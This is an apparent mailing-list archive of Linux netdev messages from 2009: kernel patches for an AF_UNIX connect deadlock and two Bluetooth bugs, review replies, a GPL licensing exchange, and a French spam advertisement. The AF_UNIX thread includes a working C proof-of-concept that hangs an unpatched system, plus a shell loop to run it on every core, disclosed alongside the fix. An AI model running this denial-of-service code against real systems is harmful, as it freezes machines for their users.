* Re: [PATCH] AF_UNIX: Fix deadlock on connecting to shutdown socket
From: David Miller @ 2009-10-19 6:18 UTC (permalink / raw)
To: tomoki.sekiyama.qu
Cc: linux-kernel, netdev, alan, satoshi.oshima.fk, hidehiro.kawai.ez,
hideo.aoki.tk
In-Reply-To: <4ADC010C.5070809@hitachi.com>
From: Tomoki Sekiyama <tomoki.sekiyama.qu@hitachi.com>
Date: Mon, 19 Oct 2009 15:02:52 +0900
> I found a deadlock bug in UNIX domain socket, which makes able to DoS
> attack against the local machine by non-root users.
...
> Why this happens:
> Error checks between unix_socket_connect() and unix_wait_for_peer() are
> inconsistent. The former calls the latter to wait until the backlog is
> processed. Despite the latter returns without doing anything when the
> socket is shutdown, the former doesn't check the shutdown state and
> just retries calling the latter forever.
>
> Patch:
> The patch below adds shutdown check into unix_socket_connect(), so
> connect(2) to the shutdown socket will return -ECONREFUSED.
>
> Signed-off-by: Tomoki Sekiyama <tomoki.sekiyama.qu@hitachi.com>
> Signed-off-by: Masanori Yoshida <masanori.yoshida.tv@hitachi.com>
Looks good, applied, thank you!
^ permalink raw reply
* [PATCH] AF_UNIX: Fix deadlock on connecting to shutdown socket
From: Tomoki Sekiyama @ 2009-10-19 6:02 UTC (permalink / raw)
To: linux-kernel, netdev, alan
Cc: davem, satoshi.oshima.fk, hidehiro.kawai.ez, hideo.aoki.tk
Hi,
I found a deadlock bug in UNIX domain socket, which makes able to DoS
attack against the local machine by non-root users.
How to reproduce:
1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstruct
namespace(*), and shutdown(2) it.
2. Repeat connect(2)ing to the listening socket from the other sockets
until the connection backlog is full-filled.
3. connect(2) takes the CPU forever. If every core is taken, the
system hangs.
PoC code: (Run as many times as cores on SMP machines.)
int main(void)
{
int ret;
int csd;
int lsd;
struct sockaddr_un sun;
/* make an abstruct name address (*) */
memset(&sun, 0, sizeof(sun));
sun.sun_family = PF_UNIX;
sprintf(&sun.sun_path[1], "%d", getpid());
/* create the listening socket and shutdown */
lsd = socket(AF_UNIX, SOCK_STREAM, 0);
bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
listen(lsd, 1);
shutdown(lsd, SHUT_RDWR);
/* connect loop */
alarm(15); /* forcely exit the loop after 15 sec */
for (;;) {
csd = socket(AF_UNIX, SOCK_STREAM, 0);
ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
if (-1 == ret) {
perror("connect()");
break;
}
puts("Connection OK");
}
return 0;
}
(*) Make sun_path[0] = 0 to use the abstruct namespace.
If a file-based socket is used, the system doesn't deadlock because
of context switches in the file system layer.
Why this happens:
Error checks between unix_socket_connect() and unix_wait_for_peer() are
inconsistent. The former calls the latter to wait until the backlog is
processed. Despite the latter returns without doing anything when the
socket is shutdown, the former doesn't check the shutdown state and
just retries calling the latter forever.
Patch:
The patch below adds shutdown check into unix_socket_connect(), so
connect(2) to the shutdown socket will return -ECONREFUSED.
Signed-off-by: Tomoki Sekiyama <tomoki.sekiyama.qu@hitachi.com>
Signed-off-by: Masanori Yoshida <masanori.yoshida.tv@hitachi.com>
---
net/unix/af_unix.c | 2 ++
1 files changed, 2 insertions(+), 0 deletions(-)
diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
index 51ab497..fc820cd 100644
--- a/net/unix/af_unix.c
+++ b/net/unix/af_unix.c
@@ -1074,6 +1074,8 @@ restart:
err = -ECONNREFUSED;
if (other->sk_state != TCP_LISTEN)
goto out_unlock;
+ if (other->sk_shutdown & RCV_SHUTDOWN)
+ goto out_unlock;
if (unix_recvq_full(other)) {
err = -EAGAIN;
--
Tomoki Sekiyama
Linux Technology Center
Hitachi, Ltd., Systems Development Laboratory
E-mail: tomoki.sekiyama.qu@hitachi.com
^ permalink raw reply related
* [PATCH 1/2] bluetooth: scheduling while atomic bug fix
From: Dave Young @ 2009-10-19 6:24 UTC (permalink / raw)
To: marcel-kz+m5ild9QBg9hUCZPvPmw
Cc: alan-qBU/x9rampVanCEyBjwyrvXRex20P6io,
oliver-fJ+pQTUTwRTk1uMJSBkQmQ, netdev-u79uwXL29TY76Z2rM5mHXA,
linux-bluetooth-u79uwXL29TY76Z2rM5mHXA,
linux-kernel-u79uwXL29TY76Z2rM5mHXA
Due to driver core changes dev_set_drvdata will call kzalloc which should be
in might_sleep context, but hci_conn_add will be called in atomic context
Like dev_set_name move dev_set_drvdata to work queue function.
oops as following:
Oct 2 17:41:59 darkstar kernel: [ 438.001341] BUG: sleeping function called from invalid context at mm/slqb.c:1546
Oct 2 17:41:59 darkstar kernel: [ 438.001345] in_atomic(): 1, irqs_disabled(): 0, pid: 2133, name: sdptool
Oct 2 17:41:59 darkstar kernel: [ 438.001348] 2 locks held by sdptool/2133:
Oct 2 17:41:59 darkstar kernel: [ 438.001350] #0: (sk_lock-AF_BLUETOOTH-BTPROTO_L2CAP){+.+.+.}, at: [<faa1d2f5>] lock_sock+0xa/0xc [l2cap]
Oct 2 17:41:59 darkstar kernel: [ 438.001360] #1: (&hdev->lock){+.-.+.}, at: [<faa20e16>] l2cap_sock_connect+0x103/0x26b [l2cap]
Oct 2 17:41:59 darkstar kernel: [ 438.001371] Pid: 2133, comm: sdptool Not tainted 2.6.31-mm1 #2
Oct 2 17:41:59 darkstar kernel: [ 438.001373] Call Trace:
Oct 2 17:41:59 darkstar kernel: [ 438.001381] [<c022433f>] __might_sleep+0xde/0xe5
Oct 2 17:41:59 darkstar kernel: [ 438.001386] [<c0298843>] __kmalloc+0x4a/0x15a
Oct 2 17:41:59 darkstar kernel: [ 438.001392] [<c03f0065>] ? kzalloc+0xb/0xd
Oct 2 17:41:59 darkstar kernel: [ 438.001396] [<c03f0065>] kzalloc+0xb/0xd
Oct 2 17:41:59 darkstar kernel: [ 438.001400] [<c03f04ff>] device_private_init+0x15/0x3d
Oct 2 17:41:59 darkstar kernel: [ 438.001405] [<c03f24c5>] dev_set_drvdata+0x18/0x26
Oct 2 17:41:59 darkstar kernel: [ 438.001414] [<fa51fff7>] hci_conn_init_sysfs+0x40/0xd9 [bluetooth]
Oct 2 17:41:59 darkstar kernel: [ 438.001422] [<fa51cdc0>] ? hci_conn_add+0x128/0x186 [bluetooth]
Oct 2 17:41:59 darkstar kernel: [ 438.001429] [<fa51ce0f>] hci_conn_add+0x177/0x186 [bluetooth]
Oct 2 17:41:59 darkstar kernel: [ 438.001437] [<fa51cf8a>] hci_connect+0x3c/0xfb [bluetooth]
Oct 2 17:41:59 darkstar kernel: [ 438.001442] [<faa20e87>] l2cap_sock_connect+0x174/0x26b [l2cap]
Oct 2 17:41:59 darkstar kernel: [ 438.001448] [<c04c8df5>] sys_connect+0x60/0x7a
Oct 2 17:41:59 darkstar kernel: [ 438.001453] [<c024b703>] ? lock_release_non_nested+0x84/0x1de
Oct 2 17:41:59 darkstar kernel: [ 438.001458] [<c028804b>] ? might_fault+0x47/0x81
Oct 2 17:41:59 darkstar kernel: [ 438.001462] [<c028804b>] ? might_fault+0x47/0x81
Oct 2 17:41:59 darkstar kernel: [ 438.001468] [<c033361f>] ? __copy_from_user_ll+0x11/0xce
Oct 2 17:41:59 darkstar kernel: [ 438.001472] [<c04c9419>] sys_socketcall+0x82/0x17b
Oct 2 17:41:59 darkstar kernel: [ 438.001477] [<c020329d>] syscall_call+0x7/0xb
Signed-off-by: Dave Young <hidave.darkstar-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org>
---
net/bluetooth/hci_sysfs.c | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
--- linux-2.6.31.orig/net/bluetooth/hci_sysfs.c 2009-10-09 20:50:43.000000000 +0800
+++ linux-2.6.31/net/bluetooth/hci_sysfs.c 2009-10-10 21:24:56.000000000 +0800
@@ -92,6 +92,8 @@ static void add_conn(struct work_struct
dev_set_name(&conn->dev, "%s:%d", hdev->name, conn->handle);
+ dev_set_drvdata(&conn->dev, conn);
+
if (device_add(&conn->dev) < 0) {
BT_ERR("Failed to register connection device");
return;
@@ -144,8 +146,6 @@ void hci_conn_init_sysfs(struct hci_conn
conn->dev.class = bt_class;
conn->dev.parent = &hdev->dev;
- dev_set_drvdata(&conn->dev, conn);
-
device_initialize(&conn->dev);
INIT_WORK(&conn->work_add, add_conn);
^ permalink raw reply
* [PATCH 2/2] bluetooth: static lock key fix
From: Dave Young @ 2009-10-19 6:28 UTC (permalink / raw)
To: marcel-kz+m5ild9QBg9hUCZPvPmw
Cc: oliver-fJ+pQTUTwRTk1uMJSBkQmQ, netdev-u79uwXL29TY76Z2rM5mHXA,
linux-bluetooth-u79uwXL29TY76Z2rM5mHXA,
linux-kernel-u79uwXL29TY76Z2rM5mHXA
When shutdown ppp connection, lockdep waring about non-static key
will happen, it is caused by the lock is not initialized properly
at that time.
Fix with tuning the lock/skb_queue_head init order
[ 94.339261] INFO: trying to register non-static key.
[ 94.342509] the code is fine but needs lockdep annotation.
[ 94.342509] turning off the locking correctness validator.
[ 94.342509] Pid: 0, comm: swapper Not tainted 2.6.31-mm1 #2
[ 94.342509] Call Trace:
[ 94.342509] [<c0248fbe>] register_lock_class+0x58/0x241
[ 94.342509] [<c024b5df>] ? __lock_acquire+0xb57/0xb73
[ 94.342509] [<c024ab34>] __lock_acquire+0xac/0xb73
[ 94.342509] [<c024b7fa>] ? lock_release_non_nested+0x17b/0x1de
[ 94.342509] [<c024b662>] lock_acquire+0x67/0x84
[ 94.342509] [<c04cd1eb>] ? skb_dequeue+0x15/0x41
[ 94.342509] [<c054a857>] _spin_lock_irqsave+0x2f/0x3f
[ 94.342509] [<c04cd1eb>] ? skb_dequeue+0x15/0x41
[ 94.342509] [<c04cd1eb>] skb_dequeue+0x15/0x41
[ 94.342509] [<c054a648>] ? _read_unlock+0x1d/0x20
[ 94.342509] [<c04cd641>] skb_queue_purge+0x14/0x1b
[ 94.342509] [<fab94fdc>] l2cap_recv_frame+0xea1/0x115a [l2cap]
[ 94.342509] [<c024b5df>] ? __lock_acquire+0xb57/0xb73
[ 94.342509] [<c0249c04>] ? mark_lock+0x1e/0x1c7
[ 94.342509] [<f8364963>] ? hci_rx_task+0xd2/0x1bc [bluetooth]
[ 94.342509] [<fab95346>] l2cap_recv_acldata+0xb1/0x1c6 [l2cap]
[ 94.342509] [<f8364997>] hci_rx_task+0x106/0x1bc [bluetooth]
[ 94.342509] [<fab95295>] ? l2cap_recv_acldata+0x0/0x1c6 [l2cap]
[ 94.342509] [<c02302c4>] tasklet_action+0x69/0xc1
[ 94.342509] [<c022fbef>] __do_softirq+0x94/0x11e
[ 94.342509] [<c022fcaf>] do_softirq+0x36/0x5a
[ 94.342509] [<c022fe14>] irq_exit+0x35/0x68
[ 94.342509] [<c0204ced>] do_IRQ+0x72/0x89
[ 94.342509] [<c02038ee>] common_interrupt+0x2e/0x34
[ 94.342509] [<c024007b>] ? pm_qos_add_requirement+0x63/0x9d
[ 94.342509] [<c038e8a5>] ? acpi_idle_enter_bm+0x209/0x238
[ 94.342509] [<c049d238>] cpuidle_idle_call+0x5c/0x94
[ 94.342509] [<c02023f8>] cpu_idle+0x4e/0x6f
[ 94.342509] [<c0534153>] rest_init+0x53/0x55
[ 94.342509] [<c0781894>] start_kernel+0x2f0/0x2f5
[ 94.342509] [<c0781091>] i386_start_kernel+0x91/0x96
Reported-by: Oliver Hartkopp <oliver-fJ+pQTUTwRTk1uMJSBkQmQ@public.gmane.org>
Signed-off-by: Dave Young <hidave.darkstar-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org>
Tested-by: Oliver Hartkopp <oliver-fJ+pQTUTwRTk1uMJSBkQmQ@public.gmane.org>
---
net/bluetooth/l2cap.c | 9 ++++++---
1 file changed, 6 insertions(+), 3 deletions(-)
--- linux-2.6.31.orig/net/bluetooth/l2cap.c 2009-10-09 08:32:46.000000000 +0800
+++ linux-2.6.31/net/bluetooth/l2cap.c 2009-10-09 08:33:57.000000000 +0800
@@ -555,12 +555,12 @@ static struct l2cap_conn *l2cap_conn_add
conn->feat_mask = 0;
- setup_timer(&conn->info_timer, l2cap_info_timeout,
- (unsigned long) conn);
-
spin_lock_init(&conn->lock);
rwlock_init(&conn->chan_list.lock);
+ setup_timer(&conn->info_timer, l2cap_info_timeout,
+ (unsigned long) conn);
+
conn->disc_reason = 0x13;
return conn;
@@ -783,6 +783,9 @@ static void l2cap_sock_init(struct sock
/* Default config options */
pi->conf_len = 0;
pi->flush_to = L2CAP_DEFAULT_FLUSH_TO;
+ skb_queue_head_init(TX_QUEUE(sk));
+ skb_queue_head_init(SREJ_QUEUE(sk));
+ INIT_LIST_HEAD(SREJ_LIST(sk));
}
static struct proto l2cap_proto = {
^ permalink raw reply
* Re: [PATCH] AF_UNIX: Fix deadlock on connecting to shutdown socket
From: Américo Wang @ 2009-10-19 7:02 UTC (permalink / raw)
To: Tomoki Sekiyama
Cc: linux-kernel, netdev, alan, davem, satoshi.oshima.fk,
hidehiro.kawai.ez, hideo.aoki.tk
In-Reply-To: <4ADC010C.5070809@hitachi.com>
On Mon, Oct 19, 2009 at 2:02 PM, Tomoki Sekiyama
<tomoki.sekiyama.qu@hitachi.com> wrote:
> Hi,
> I found a deadlock bug in UNIX domain socket, which makes able to DoS
> attack against the local machine by non-root users.
>
> How to reproduce:
> 1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstruct
> namespace(*), and shutdown(2) it.
> 2. Repeat connect(2)ing to the listening socket from the other sockets
> until the connection backlog is full-filled.
> 3. connect(2) takes the CPU forever. If every core is taken, the
> system hangs.
>
> PoC code: (Run as many times as cores on SMP machines.)
Interesting...
I tried this with the following command:
% for i in `seq 1 $(grep processor -c /proc/cpuinfo)`;
do ./unix-socket-dos-exploit; echo "=====$i====";done
Connection OK
Connection OK
=====1====
Connection OK
Connection OK
=====2====
Connection OK
Connection OK
=====3====
Connection OK
Connection OK
=====4====
My system doesn't hang at all.
Am I missing something?
Thanks!
>
> int main(void)
> {
> int ret;
> int csd;
> int lsd;
> struct sockaddr_un sun;
>
> /* make an abstruct name address (*) */
> memset(&sun, 0, sizeof(sun));
> sun.sun_family = PF_UNIX;
> sprintf(&sun.sun_path[1], "%d", getpid());
>
> /* create the listening socket and shutdown */
> lsd = socket(AF_UNIX, SOCK_STREAM, 0);
> bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
> listen(lsd, 1);
> shutdown(lsd, SHUT_RDWR);
>
> /* connect loop */
> alarm(15); /* forcely exit the loop after 15 sec */
> for (;;) {
> csd = socket(AF_UNIX, SOCK_STREAM, 0);
> ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
> if (-1 == ret) {
> perror("connect()");
> break;
> }
> puts("Connection OK");
> }
> return 0;
> }
>
> (*) Make sun_path[0] = 0 to use the abstruct namespace.
> If a file-based socket is used, the system doesn't deadlock because
> of context switches in the file system layer.
>
> Why this happens:
> Error checks between unix_socket_connect() and unix_wait_for_peer() are
> inconsistent. The former calls the latter to wait until the backlog is
> processed. Despite the latter returns without doing anything when the
> socket is shutdown, the former doesn't check the shutdown state and
> just retries calling the latter forever.
>
> Patch:
> The patch below adds shutdown check into unix_socket_connect(), so
> connect(2) to the shutdown socket will return -ECONREFUSED.
>
> Signed-off-by: Tomoki Sekiyama <tomoki.sekiyama.qu@hitachi.com>
> Signed-off-by: Masanori Yoshida <masanori.yoshida.tv@hitachi.com>
> ---
> net/unix/af_unix.c | 2 ++
> 1 files changed, 2 insertions(+), 0 deletions(-)
>
> diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
> index 51ab497..fc820cd 100644
> --- a/net/unix/af_unix.c
> +++ b/net/unix/af_unix.c
> @@ -1074,6 +1074,8 @@ restart:
> err = -ECONNREFUSED;
> if (other->sk_state != TCP_LISTEN)
> goto out_unlock;
> + if (other->sk_shutdown & RCV_SHUTDOWN)
> + goto out_unlock;
>
> if (unix_recvq_full(other)) {
> err = -EAGAIN;
^ permalink raw reply
* Re: [OT] ntop / GPL (was Re: PF_RING: Include in main line kernel?)
From: Jarek Poplawski @ 2009-10-19 7:12 UTC (permalink / raw)
To: Harald Welte; +Cc: Brad Doctor, netdev, Luca Deri
In-Reply-To: <20091019055521.GA5948@ff.dom.local>
On Mon, Oct 19, 2009 at 05:55:21AM +0000, Jarek Poplawski wrote:
> On Sun, Oct 18, 2009 at 02:47:06PM +0200, Harald Welte wrote:
> > Hi Jarek, Brad, Luca,
> >
> > [putting my gpl-violations.org hat on]
> >
> > On Wed, Oct 14, 2009 at 06:46:11PM +0200, Jarek Poplawski wrote:
> > > Brad Doctor wrote, On 10/14/2009 04:33 PM:
> > >
> > > > Download ntop
> > > >
> > > > ntop is distributed under the GNU GPL. In order to be entitled to download
> > > > ntop you must accept the GNU license.
> > >
> > > I can't find such a thing neither in GNU GPL v2:
> >
> > This is true. The GPL does never need to be accepted for mere use (i.e.
> > running) the program. This is at least true for the continental european
> > copyright systems, where any legally obtained copy of a program implicitly
> > carries the permission for running the program. Only for any other activity
> > you will need to accept the license.
> >
> > but, like others posted in this thread, ntop is not the PF_RING code.
>
> ntop doesn't matter here at all:
Or more precisely: "ntop is not PF_RING code" doesn't matter here,
because it all suggests we have a false statement wrt. PF_RING.
(But Brad acknowledged this needs the change.)
>
> if ((X uses the stock GPL license.) &&
> (Y is distributed under the GNU GPL) &&
> (In order to be entitled to download Y
> you must accept the GNU license.) &&
> (The GPL does never need to be accepted for mere use.))
>
> is logically false.
>
> BTW, legal systems don't matter here at all.
IOW: if this point of GNU GPL isn't true for some copyright system,
means GNU GPL can't be valid in such a system.
Jarek P.
^ permalink raw reply
* Participez GRATUITEMENT � des centaines de jeux concours gratuits en quelques clics !
From: noreply @ 2009-10-18 17:24 UTC (permalink / raw)
To: netdev
[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain; charset=UTF-8, Size: 2460 bytes --]
<http://www.cashtrafic.com/script/clic.php?id=80093&option=emailing&ban=3726&data=&redirection=http%3A%2F%2Fwww.konkours.com%2Fpubs%2Fpdv-module%2Fpdv3_index.php%3Fparent%3Dcash%26pdv%3D1%26form_type%3D1%26d%3D5957>
<http://www.cashtrafic.com/script/clic.php?id=80093&option=emailing&ban=3726&data=&redirection=http%3A%2F%2Fwww.konkours.com%2Fpubs%2Fpdv-module%2Fpdv3_index.php%3Fparent%3Dcash%26pdv%3D1%26form_type%3D1%26d%3D5957>
<http://www.cashtrafic.com/script/clic.php?id=80093&option=emailing&ban=3726&data=&redirection=http%3A%2F%2Fwww.konkours.com%2Fpubs%2Fpdv-module%2Fpdv3_index.php%3Fparent%3Dcash%26pdv%3D1%26form_type%3D1%26d%3D5957>
<http://www.cashtrafic.com/script/clic.php?id=80093&option=emailing&ban=3726&data=&redirection=http%3A%2F%2Fwww.konkours.com%2Fpubs%2Fpdv-module%2Fpdv3_index.php%3Fparent%3Dcash%26pdv%3D1%26form_type%3D1%26d%3D5957>
<http://www.cashtrafic.com/script/clic.php?id=80093&option=emailing&ban=3726&data=&redirection=http%3A%2F%2Fwww.konkours.com%2Fpubs%2Fpdv-module%2Fpdv3_index.php%3Fparent%3Dcash%26pdv%3D1%26form_type%3D1%26d%3D5957>
<http://www.cashtrafic.com/script/clic.php?id=80093&option=emailing&ban=3726&data=&redirection=http%3A%2F%2Fwww.konkours.com%2Fpubs%2Fpdv-module%2Fpdv3_index.php%3Fparent%3Dcash%26pdv%3D1%26form_type%3D1%26d%3D5957>
<http://www.cashtrafic.com/script/clic.php?id=80093&option=emailing&ban=3726&data=&redirection=http%3A%2F%2Fwww.konkours.com%2Fpubs%2Fpdv-module%2Fpdv3_index.php%3Fparent%3Dcash%26pdv%3D1%26form_type%3D1%26d%3D5957>
<http://www.cashtrafic.com/script/clic.php?id=80093&option=emailing&ban=3726&data=&redirection=http%3A%2F%2Fwww.konkours.com%2Fpubs%2Fpdv-module%2Fpdv3_index.php%3Fparent%3Dcash%26pdv%3D1%26form_type%3D1%26d%3D5957>
<http://www.cashtrafic.com/script/clic.php?id=80093&option=emailing&ban=3726&data=&redirection=http%3A%2F%2Fwww.konkours.com%2Fpubs%2Fpdv-module%2Fpdv3_index.php%3Fparent%3Dcash%26pdv%3D1%26form_type%3D1%26d%3D5957>
--
Si vous ne voulez plus recevoir nos lettres d'information,
http://www.sevaderpascher.fr/lists/?p=unsubscribe&uid=5c67341e009a3314feaec4254a3c8a52
Mettre à jour mes préférences ou me désabonner
http://www.sevaderpascher.fr/lists/?p=preferences&uid=5c67341e009a3314feaec4254a3c8a52
Envoyer ce Message à un ami,
http://www.sevaderpascher.fr/lists/?p=forward&uid=5c67341e009a3314feaec4254a3c8a52&mid=3
--
Powered by PHPlist, www.phplist.com --
^ permalink raw reply
* Re: [PATCH 1/2] page allocator: Always wake kswapd when restarting an allocation attempt after direct reclaim failed
From: Christoph Lameter @ 2009-10-19 7:40 UTC (permalink / raw)
To: Mel Gorman
Cc: Andrew Morton, stable, Rafael J. Wysocki, David Miller, Frans Pop,
reinette chatre, Kalle Valo, John W. Linville, Pekka Enberg,
Bartlomiej Zolnierkiewicz, Karol Lewandowski, netdev,
linux-kernel, linux-mm@kvack.org"
In-Reply-To: <1255689446-3858-2-git-send-email-mel@csn.ul.ie>
Reviewed-by: Christoph Lameter <cl@linux-foundation.org>
^ permalink raw reply
* Re: [PATCH] myri10ge: improve port type reporting in ethtool output
From: Ben Hutchings @ 2009-10-19 8:12 UTC (permalink / raw)
To: Brice Goglin; +Cc: David S. Miller, Linux Network Development list
In-Reply-To: <4ADBFA88.8030300@myri.com>
On Mon, 2009-10-19 at 07:35 +0200, Brice Goglin wrote:
> Improve the reporting of the port type in ethtool,
> update for new boards.
>
> Signed-off-by: Brice Goglin <brice@myri.com>
>
> --- a/drivers/net/myri10ge/myri10ge.c
> +++ b/drivers/net/myri10ge/myri10ge.c
> @@ -75,7 +75,7 @@
> #include "myri10ge_mcp.h"
> #include "myri10ge_mcp_gen_header.h"
>
> -#define MYRI10GE_VERSION_STR "1.5.0-1.432"
> +#define MYRI10GE_VERSION_STR "1.5.1-1.450"
>
> MODULE_DESCRIPTION("Myricom 10G driver (10GbE)");
> MODULE_AUTHOR("Maintainer: help@myri.com");
> @@ -1601,6 +1601,8 @@ myri10ge_get_settings(struct net_device *netdev,
> struct ethtool_cmd *cmd)
> cmd->autoneg = AUTONEG_DISABLE;
> cmd->speed = SPEED_10000;
> cmd->duplex = DUPLEX_FULL;
> + cmd->supported = SUPPORTED_10000baseT_Full;
> + cmd->advertising = ADVERTISED_10000baseT_Full;
[...]
Lying about link modes is not an improvement.
Ben.
--
Ben Hutchings, Senior Software Engineer, Solarflare Communications
Not speaking for my employer; that's the marketing department's job.
They asked us to note that Solarflare product names are trademarked.
^ permalink raw reply
* [PATCH] net: Fix struct inet_timewait_sock bitfield annotation
From: Eric Dumazet @ 2009-10-19 8:48 UTC (permalink / raw)
To: David S. Miller; +Cc: Linux Netdev List
commit 9e337b0f (net: annotate inet_timewait_sock bitfields)
added 4/8 bytes in struct inet_timewait_sock.
Fix this by declaring tw_ipv6_offset in the 'flags' bitfield
The 14 bits hole is named tw_pad to make it cleary apparent.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
---
diff --git a/include/net/inet_timewait_sock.h b/include/net/inet_timewait_sock.h
index 37f3aea..b5ad469 100644
--- a/include/net/inet_timewait_sock.h
+++ b/include/net/inet_timewait_sock.h
@@ -130,11 +130,11 @@ struct inet_timewait_sock {
__u16 tw_num;
kmemcheck_bitfield_begin(flags);
/* And these are ours. */
- __u8 tw_ipv6only:1,
- tw_transparent:1;
- /* 14 bits hole, try to pack */
+ unsigned int tw_ipv6only : 1,
+ tw_transparent : 1,
+ tw_pad : 14, /* 14 bits hole */
+ tw_ipv6_offset : 16;
kmemcheck_bitfield_end(flags);
- __u16 tw_ipv6_offset;
unsigned long tw_ttd;
struct inet_bind_bucket *tw_tb;
struct hlist_node tw_death_node;
^ permalink raw reply related
* Re: [PATCH] AF_UNIX: Fix deadlock on connecting to shutdown socket
From: Tomoki Sekiyama @ 2009-10-19 8:54 UTC (permalink / raw)
To: xiyou.wangcong
Cc: linux-kernel, netdev, alan, davem, satoshi.oshima.fk,
hidehiro.kawai.ez, hideo.aoki.tk
In-Reply-To: <2375c9f90910190002m372edafq9a4c95d754640487@mail.gmail.com>
Hi, thanks for testing!
Américo Wang wrote:
> On Mon, Oct 19, 2009 at 2:02 PM, Tomoki Sekiyama
> <tomoki.sekiyama.qu@hitachi.com> wrote:
>> Hi,
>> I found a deadlock bug in UNIX domain socket, which makes able to DoS
>> attack against the local machine by non-root users.
>>
>> How to reproduce:
>> 1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstruct
>> namespace(*), and shutdown(2) it.
>> 2. Repeat connect(2)ing to the listening socket from the other sockets
>> until the connection backlog is full-filled.
>> 3. connect(2) takes the CPU forever. If every core is taken, the
>> system hangs.
>>
>> PoC code: (Run as many times as cores on SMP machines.)
Sorry for my ambiguous explanation ...
> Interesting...
>
> I tried this with the following command:
>
> % for i in `seq 1 $(grep processor -c /proc/cpuinfo)`;
> do ./unix-socket-dos-exploit; echo "=====$i====";done
<snip>
> My system doesn't hang at all.
>
> Am I missing something?
>
> Thanks!
You should run the ./unix-socket-dos-exploit concurrently, like below:
for i in {1..4} ; do ./unix-socket-dos-exploit & done
# For safety reason, the PoC code stops in 15 seconds by alarm(15).
--
Tomoki Sekiyama
Linux Technology Center
Hitachi, Ltd., Systems Development Laboratory
E-mail: tomoki.sekiyama.qu@hitachi.com
^ permalink raw reply
* Re: [PATCH] AF_UNIX: Fix deadlock on connecting to shutdown socket
From: Tomoki Sekiyama @ 2009-10-19 8:58 UTC (permalink / raw)
To: linux-kernel, netdev
Cc: alan, davem, satoshi.oshima.fk, hidehiro.kawai.ez, hideo.aoki.tk,
masanori.yoshida.tv
In-Reply-To: <2375c9f90910190002m372edafq9a4c95d754640487@mail.gmail.com>
Hi, thanks for testing!
Américo Wang wrote:
> On Mon, Oct 19, 2009 at 2:02 PM, Tomoki Sekiyama
> <tomoki.sekiyama.qu@hitachi.com> wrote:
>> Hi,
>> I found a deadlock bug in UNIX domain socket, which makes able to DoS
>> attack against the local machine by non-root users.
>>
>> How to reproduce:
>> 1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstruct
>> namespace(*), and shutdown(2) it.
>> 2. Repeat connect(2)ing to the listening socket from the other sockets
>> until the connection backlog is full-filled.
>> 3. connect(2) takes the CPU forever. If every core is taken, the
>> system hangs.
>>
>> PoC code: (Run as many times as cores on SMP machines.)
Sorry for my ambiguous explanation ...
> Interesting...
>
> I tried this with the following command:
>
> % for i in `seq 1 $(grep processor -c /proc/cpuinfo)`;
> do ./unix-socket-dos-exploit; echo "=====$i====";done
<snip>
> My system doesn't hang at all.
>
> Am I missing something?
>
> Thanks!
You should run the ./unix-socket-dos-exploit concurrently, like below:
for i in {1..4} ; do ./unix-socket-dos-exploit & done
# For safety reason, the PoC code stops in 15 seconds by alarm(15).
--
Tomoki Sekiyama
Linux Technology Center
Hitachi, Ltd., Systems Development Laboratory
E-mail: tomoki.sekiyama.qu@hitachi.com
^ permalink raw reply
* Re: [PATCH] AF_UNIX: Fix deadlock on connecting to shutdown socket
From: Américo Wang @ 2009-10-19 9:06 UTC (permalink / raw)
To: Tomoki Sekiyama
Cc: linux-kernel, netdev, alan, davem, satoshi.oshima.fk,
hidehiro.kawai.ez, hideo.aoki.tk, masanori.yoshida.tv
In-Reply-To: <4ADC2A1D.2090303@hitachi.com>
On Mon, Oct 19, 2009 at 4:58 PM, Tomoki Sekiyama
<tomoki.sekiyama.qu@hitachi.com> wrote:
> Hi, thanks for testing!
>
> Américo Wang wrote:
>> On Mon, Oct 19, 2009 at 2:02 PM, Tomoki Sekiyama
>> <tomoki.sekiyama.qu@hitachi.com> wrote:
>>> Hi,
>>> I found a deadlock bug in UNIX domain socket, which makes able to DoS
>>> attack against the local machine by non-root users.
>>>
>>> How to reproduce:
>>> 1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstruct
>>> namespace(*), and shutdown(2) it.
>>> 2. Repeat connect(2)ing to the listening socket from the other sockets
>>> until the connection backlog is full-filled.
>>> 3. connect(2) takes the CPU forever. If every core is taken, the
>>> system hangs.
>>>
>>> PoC code: (Run as many times as cores on SMP machines.)
>
> Sorry for my ambiguous explanation ...
>
>> Interesting...
>>
>> I tried this with the following command:
>>
>> % for i in `seq 1 $(grep processor -c /proc/cpuinfo)`;
>> do ./unix-socket-dos-exploit; echo "=====$i====";done
> <snip>
>> My system doesn't hang at all.
>>
>> Am I missing something?
>>
>> Thanks!
>
> You should run the ./unix-socket-dos-exploit concurrently, like below:
>
> for i in {1..4} ; do ./unix-socket-dos-exploit & done
>
> # For safety reason, the PoC code stops in 15 seconds by alarm(15).
Hmm, you are right.
My system hangs for 10 or more seconds after I did what you said.
Confirmed.
Thanks!
^ permalink raw reply
* Re: [PATCH] Add sk_mark route lookup support for IPv4 listening sockets, and for IPv4 multicast forwarding
From: steve @ 2009-10-19 8:20 UTC (permalink / raw)
To: Maciej Żenczykowski
Cc: David Miller, atis, netdev, panther, eric.dumazet, brian.haley
In-Reply-To: <55a4f86e0910141133y4decdeb4v43d9168687bbb724@mail.gmail.com>
Hi,
On Wed, Oct 14, 2009 at 11:33:39AM -0700, Maciej Żenczykowski wrote:
> > I don't agree. There are two route lookups with a tunnel, the
> > internal one and the tunnel one. Here is an example of what I'm
> > thinking:
> >
> > 1. Look up a route which points at a remote ip addres via a tunnel device.
> > The "setmark" on this route sets the skb mark
>
> imho, this is much better done by having the mark setting performed
> explicitly by the tunnel device itself.
> That's also were we set ttl and qos (or inherit) on the outgoing packet).
>
Yes, I think (having looked at the code a bit more in the mean time)
